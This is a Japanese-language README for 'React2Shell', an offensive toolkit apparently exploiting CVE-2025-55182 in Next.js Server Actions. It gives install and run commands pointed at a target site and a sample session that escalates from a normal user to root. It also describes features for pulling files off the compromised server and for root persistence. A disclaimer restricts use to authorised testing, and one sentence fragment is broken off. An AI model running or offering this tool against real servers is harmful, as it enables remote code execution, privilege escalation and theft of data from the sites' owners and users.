
Next.js Server Actions 向け高度な悪用ツールキット (CVE-2025-55182)
Next.js Server Actions(CVE-2025-55182)向け高度エクスプロイトツールキット。
React2Shell は、React2Shell の脆弱性を悪用するために設計された、強力な対話型シェルラッパーです。単純な RCE を超え、コマンド履歴、ファイル転送機能、自動化された権限昇格戦略を提供します。
base64 | sudo -i)。.download <remote> [local]: base64 エンコーディングを使用した信頼性の高いバイナリセーフなファイルダウンロード。.save: コマンド出力をローカルのエビデンスファイルに保存。
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
検証済みのルート永続化戦略検出を有効にして実行:
python3 react2shell.py -u https://target.com/
シェル内に入ると:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
教育目的専用です。 このツールは、セキュリティ研究および許可を得たテスト専用に意図されています。作者は、このツールの誤用または損害について一切責任を負いません。明示的な許可がないターゲットをスキャンまたは悪用しないでください。
倫理的なペネトレーションテストおよびレッドチーム運用のために開発されました。
| コマンド | 説明 |
|---|
.root | ルートモードを切り替え(コマンドを sudo -i でラップ) |
.download <file> | リモートサーバーからファイルをダウンロード |
.save | 最後のコマンドの出力をファイルに保存 |
.exit | シェルを終了 |